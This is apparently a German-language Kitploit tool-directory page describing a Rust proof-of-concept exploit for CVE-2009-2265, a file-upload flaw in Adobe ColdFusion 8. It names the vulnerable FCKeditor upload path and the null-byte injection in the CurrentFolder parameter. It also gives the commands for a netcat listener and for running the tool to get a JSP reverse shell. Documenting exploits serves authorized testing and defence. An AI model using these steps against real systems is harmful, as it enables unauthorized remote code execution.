Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2009-2265 — Eine Rust-Implementierung des POC für den CVE-2009-2265-Exploit, der Adobe ColdFusion 8 angreift. | Kitploit
Tools/GitHubGitHub/nika0x38/cve-2009-2265
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

Eine Rust-Implementierung des POC für den CVE-2009-2265-Exploit, der Adobe ColdFusion 8 angreift.

Repository anzeigen
7vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2009-2265 - Adobe ColdFusion 8 Datei-Upload-RCE

RustSecurity

Eine Rust-Implementierung des POC für den CVE-2009-2265-Exploit, die auf Adobe ColdFusion 8 abzielt.


Schwachstellenübersicht

Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Dateien in ein über das Web erreichbares Verzeichnis auf einem Server mit Adobe ColdFusion 8 hochzuladen, was zu Remote Code Execution (RCE) führt.

Technische Details

  • Schwachstelle: Verzeichnis-Traversal per Null-Byte-Injection
  • Komponente: FCKeditor upload.cfm-Connector
  • Parameter: CurrentFolder
  • Auswirkung: Remote Code Execution (RCE)
  • Betroffene Software: Adobe ColdFusion 8.0.1 und früher

Beschreibung

Die Schwachstelle befindet sich in der Datei-Upload-Funktionalität der FCKeditor-Komponente unter /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm. Der HTTP-GET-Parameter CurrentFolder wird nicht ordnungsgemäß bereinigt, was einen Null-Byte-Injection-Angriff (%00) ermöglicht.

Durch das Erstellen einer Anfrage, bei der der Parameter CurrentFolder auf /<filename>.jsp%00 gesetzt ist, kann ein Angreifer die serverseitigen Erweiterungsprüfungen umgehen. Das zugrunde liegende System (oft Java) interpretiert das Null-Byte als Ende der Zeichenkette und behandelt den Dateinamen als <filename>.jsp. Dadurch kann der Angreifer eine bösartige JSP-Datei hochladen. Der Server speichert diese Datei in einem öffentlich zugänglichen Verzeichnis (/userfiles/file/), von wo aus sie durch einfaches Aufrufen ihrer URL ausgeführt werden kann.

Dieser POC automatisiert den Prozess, indem er ein JSP-Reverse-Shell-Payload generiert, es mithilfe der Null-Byte-Schwachstelle hochlädt und auslöst, um eine Shell auf dem Zielsystem zu erlangen.

Verwendung

Befolgen Sie diese Schritte, um den Exploit zu kompilieren und auszuführen.

Schritt 1: Netcat-Listener einrichten

Starten Sie vor der Ausführung des Exploits einen Listener auf Ihrem lokalen Rechner, um die eingehende Reverse Shell zu empfangen.


nc -lnvp <attacker-port>

Schritt 2: Den Exploit ausführen

Führen Sie die kompilierte Binärdatei aus und geben Sie dabei Ihren lokalen Host/Port für die Reverse Shell sowie den Host/Port des entfernten Ziels an.


cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

Nachdem das Skript das Payload ausgelöst hat, sollten Sie eine Verbindung auf Ihrem Netcat-Listener empfangen.

Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben.

Tool herunterladen